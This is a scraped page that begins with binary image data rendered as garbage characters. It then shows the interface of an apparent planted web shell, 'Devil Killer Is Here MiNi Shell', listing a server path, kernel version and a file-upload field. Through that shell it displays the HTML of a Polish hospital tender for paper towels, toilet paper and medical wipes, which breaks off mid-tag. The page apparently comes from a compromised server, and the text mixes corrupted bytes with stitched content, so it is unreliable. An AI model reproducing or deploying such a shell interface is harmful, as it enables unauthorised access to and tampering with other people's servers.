JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230801/0033452401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wraz z dostawą wkładów do dozowników na: papier toaletowy, ręczniki w roli, ręczniki ZZ oraz czyściwa medycznego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI SZPITAL SPECJALISTYCZNY IM.J.GROMKOWSKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000290469</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Koszarowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">51-149</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">estrak@szpitalwroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.wroc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wraz z dostawą wkładów do dozowników na: papier toaletowy, ręczniki w roli, ręczniki ZZ oraz czyściwa medycznego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9c06fa3-302a-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00334524</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00137963/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.67 dostawa wkładów do dozowników na ręczniki papierowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b9c06fa3-302a-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital_gromkowskiego</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/strona/45- instrukcje</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.szpital.wroc.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP 65/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 449104,05 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ręczniki ZZ. Makulaturowy,o wymiarach 21-23x25cm. Gramatura min. 30 g/m2.Jednowarstwowy, makulaturowy papier do stosowania w pomieszczeniach o zwiększonym natężeniu użytkowania. Ilość listków w opakowaniu zbiorczym (kartonie) 4000-4100 sz.<br/>Jednostka miary karton.<br/>Papier toaletowy typu Jumbo, Jednowarstwowy, makulaturowy papier do stosowania w pomieszczeniach o zwiększonym natężeniu użytkowania. Średnica rolki 18 cm +/- 1cm, szerokość rolki 13 cm +/-0,5 cm. Wysokość rolki 9 cm. Gramatura 32 g/m3 Długość rolki 130 m +/- 10% Rolka z perforacją.Bezzapachowy. W opakowaniu 12 sztuk. Jednostka miary opakowanie.<br/>Ręcznik papierowy w roli z gilzą tekrurową:Materiał: Celuloza<br/>Kolor: Biały<br/>Długość rolki: min. 100 metrów<br/>Szerokość listka: 23 cm szerokości (+/-1cm)<br/>Ilość warstw: 2 warstwy minimum 17g na warstwę<br/>W opakowaniu 6 sztuk. Jednostka miary opakowanie zawierające 6 rolek.<br/>Czyściwo wiskozowe w roli. Wymiary listka: 24 x 39 cm (+/-1cm)<br/>Długość rolki:115-120 mb,Gramatura – 60-70 gr/m2,<br/>Waga rolki - 3 kg (+/- 10%),Struktura: perforowana, dziurkowana. Rolka z perforacją umożliwiająca łatwe rozdzielenie na pojedyncze listki.Grubość (ilość warstw): 1,Średnica rolki: 24 cm (+/- 10%), Jednostka miary 1 rolka. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 401520,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37823000-3 - Papier tłuszczoodporny i inne wyroby papierowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ręcznik jednowarstwowy w roli wykonany z celulozy dł. rolki 280m, szer. rolki 21cm, śr. rolki 19cm. Rolka o długości 280m, gramatura 31g/m2. Po jednej stronie rolki znajduje się plastikowy plug umożliwiający łatwy montaż rolki w dozowniku. Plug jest integralną częścią rolki. Nasycenie bieli 86%. Ręcznik przystosowany do dozownika z gilotyną , który dozuje po jednym odcinku ręcznika o długości 25cm. Rolki ręcznika zapakowana w oryginalnym opakowaniu. Opakowanie to karton zawierający 6 rolek. Ręcznik posiadający certyfikat ekologiczny EU Ecolabel, certyfikat FSC MIX oraz dopuszczenie do kontaktu z żywnością. Na kartonie umieszczony : nazwa produktu, numer produktu, nazwa producenta, Kod EAN umożliwiające identyfikację produktu oraz podmiotu odpowiadającego za produkt. Jednostka miary karton, zawierający 6 rolek.<br/>Ręcznik w roli do systemu dozującego po jednym odcinku. Odcinek odcinany za pomocą gilotyny (6 szt. w kartonie) - 2 warstwowy, biały, miękki - wymiary odcinka po odcięciu gilotyną: 21x25 cm ( +- 2 mm) - 1 warstwa celuloza i 1 warstwa makulatura - długość roli 150 m ( +_ 2%) - średnica rolki 19 cm ( +_ 2%) - nasycenie bieli 82 % - gramatura całkowita 41,5 g/m2 ( +_ 2%) - każda rolka z wbudowanym z boku oryginalnie plugiem umożliwiającym szybkie zamontowanie roli w dozowniku Ręcznik posiadający dopuszczenie do kontaktu z żywnością oraz certyfikat ekologiczny EU Ecolabel. Ręcznik wykonany w technologii, dzięki której jest bardziej chłonny oraz wytrzymały na rozrywanie. Produkt posiadający certyfikat FSC MIX. Ręcznik pakowany po 6 sztuk w kartonie. Karton opisany Kodem EAN, nazwą produktu, nazwą producenta odpowiedzialnego za produkt. Jednostka miary karton, zawierający 6 rolek.<br/>Papier toaletowy, pasujący do dozownika z automatyczną zmianą rolek w systemie Tork T6. Papier o długości 135 m i szerokości 9,9 cm. Nie dzielony na odcinki - brak perforacji. Jednowarstwowy, wykonany z makulatury. Gramatura 23 g/m2. Nasycenie bieli 82%. Rolka posiada plagi w gilzach umożliwiające szybki montaż rolki w dozowniku. Ilość sztuk w kartonie: 27. Papier posiadający certyfikat ekologiczny EU ECOLABEL oraz certyfikat FSC Recycled. Na kartonie umieszczony : nazwa produktu, numer produktu, nazwa producenta, Kod EAN umożliwiające identyfikację produktu oraz podmiotu odpowiadającego za produkt. <br/>Jednostka miary karton , zawierający 27 rolek.<br/>Czyściwo perforowane w roli centralnego dozowania, do lekkich zabrudzeń. Posiadające wyjmowaną gilzę Smart Core. Chłonne, wytrzymałe, 1 -warstwowe w kolorze białym (nasycenie bieli 77%), wykonane z makulatury o wymiarach odcinka 19,8 x 35 cm. Długość rolki 300 m ( +- 2%), ilość odcinków 857 szt, gramatura 24,5 g/m2. Czyściwo dozowanie przez dozownik po jednym odcinku. Czyściwo posiadające certyfikat ekologiczny EU ECOLABEL. oraz dopuszczenie do kontaktu z żywnością a także certyfikat FSC Recycled. Ostatnie od 3-5 m ręcznika z nadrukiem paska w kolorze niebieskim umożliwiający kontrolę zużycia wkładu Opakowanie zbiorcze 6 sztuk. Na kartonie umieszczony : nazwa produktu, numer produktu, nazwa producenta, Kod EAN umożliwiające identyfikację produktu oraz podmiotu odpowiadającego za produkt. Jednostka miary karton zawierający 6 rolek.<br/>Papier toaletowy, pasujący do dozownika z automatyczną zmianą rolek. . Papier o długości 100 m i szerokości 9,9 cm. Papier toaletowy bez perforacji. Dwuwarstwowy, wykonany z makulatury. Gramatura całkowita 31 g/m2. Nasycenie bieli 82%. Rolka posiada plagi w gilzach umożliwiające szybki montaż rolki w dozowniku. Ilość sztuk w kartonie: 27. Papier posiadający certyfikat ekologiczny EU ECOLABEL oraz FSC Recycled. Na kartonie znajduje się nazwa produktu, nazwa producenta produktu, kod EAN. <br/>Jednostka miary karton , zawierający 27 rolek. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 50280,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37823000-3 - Papier tłuszczoodporny i inne wyroby papierowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Włóknina Medyczna w rolce (wkład do pozycji 2)<br/>Suche chusteczki w rolkach do nasączania dowolnym środkiem myjącym lub dezynfekcyjnym. Przeznaczone do mycia, dezynfekcji lub osuszania skóry, powierzchni, wyrobów medycznych. Chusteczki wysokiej jakości, wykonane z wysokogatunkowej włókniny, mieszanki celulozy, poliestru i wiskozy, o gramaturze 70g/m2. Chusteczki nie pozostawiają włókien, smug. Produkt niepylący. Chusteczki o wymiarach nie mniejszych niż 18 cm x 25 cm .Wkład. Pakowany w worku strunowym.<br/>Skład:Celuloza 55 %, Poliester 43 %, Wiskoza 2 %<br/>Proces produkcji Na mokro<br/>Waga g/m² 73+/- 10% <br/>Grubość mm 0.4 <br/>Wytrzymałość na wzdłużne i poprzeczne rozciąganie suchych daN &gt;6,5 <br/>Wytrzymałość na wzdłużne i poprzeczne rozciąganie mokrych daN &gt;5,5<br/>Wytrzymałość na rozerwanie suchych % &lt;80-100 <br/>Wytrzymałośc na rozerwanie mokrych % &lt;90-110<br/>Możliwość absorpcyjne wody % &gt;500 EDANA 10.2-96/2<br/>Czas absorcji wody sek. &lt;7 EDANA 10.2-96/1<br/>Strzępienie g/m² &lt;1,5 EDANA 300.0.84. <br/>Wyrób medyczny.<br/>Włóknina Medyczna w rolce w wiaderku.<br/>Suche chusteczki w rolkach do nasączania dowolnym środkiem myjącym lub dezynfekcyjnym. Przeznaczone do mycia, dezynfekcji lub osuszania skóry, powierzchni, wyrobów medycznych. Chusteczki wysokiej jakości, wykonane z wysokogatunkowej włókniny, mieszanki celulozy, poliestru i wiskozy, o gramaturze 70g/m2. Chusteczki nie pozostawiają włókien, smug. Produkt niepylący. Chusteczki o wymiarach nie mniejszych niż 18 cm x 25 cm . Pakowane w hermetycznym pojemniku wyposażonym w system nadający się do poboru pojedynczych chusteczek oddzielonych perforacją pozwalającą na łatwe dozowanie. Trwałe, wytrzymałe wiaderko wielokrotnego użytku, ze szczelnym zamknięciem zapobiegającym wysychaniu nasączonych chusteczek. Pojemniki wykonane z polietylenu i polipropylenu niewrażliwe na działanie preparatów dezynfekcyjnych, nadające się do maszynowego mycia w temperaturze powyżej 55°C.<br/>Skład Celuloza 55 %, Poliester 43 %, Wiskoza 2 %<br/>Proces produkcji Na mokro<br/>Waga g/m² 73 (+/- 10%)<br/>Grubość mm 0.4 <br/>Wytrzymałość na wzdłużne i poprzeczne rozciąganie suchych daN &gt;6,5 <br/>Wytrzymałość na wzdłużne i poprzeczne rozciąganie mokrych daN &gt;5,5<br/>Wytrzymałość na rozerwanie suchych % &lt;80-100 <br/>Wytrzymałośc na rozerwanie mokrych % &lt;90-110<br/>Możliwość absorpcyjne wody % &gt;500 EDANA 10.2-96/2<br/>Czas absorcji wody sek. &lt;7 EDANA 10.2-96/1<br/>Strzępienie g/m² &lt;1,5 EDANA 300.0.84. <br/>Wyrób medyczny. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7149,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37823000-3 - Papier tłuszczoodporny i inne wyroby papierowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia określonego w niniejszej SWZ mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu określone przez zamawiającego, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym tzn.: <br/>• są wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania, co w przypadku wykonawców mających siedzibę na terenie Rzeczypospolitej Polskiej (RP) oznacza, że są wpisani do Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów tzn.: ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE.<br/>3) sytuacji ekonomicznej lub finansowej tzn.: ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE.<br/>4) zdolności technicznej lub zawodowej tzn.:<br/> ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert OŚWIADCZENIE w zakresie wskazanym w załączniku nr 3; (Załącznik nr 3a i Załącznik nr 3b - dla podmiotów udostępniających zasoby, podmiotów trzecich) do SWZ, potwierdzające, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych (Krajowy Rejestr Sądowy lub Centralna Ewidencja i Informacja o Działalności Gospodarczej), prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem;<br/>2) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 6 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (TJ Dz. U. z 2021r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Do zadania 1,2,3 wymagana karta produktu potwierdzająca wskazane w opisie parametry. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Do zadania 1,2,3 wymagana karta produktu potwierdzająca wskazane w opisie parametry <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 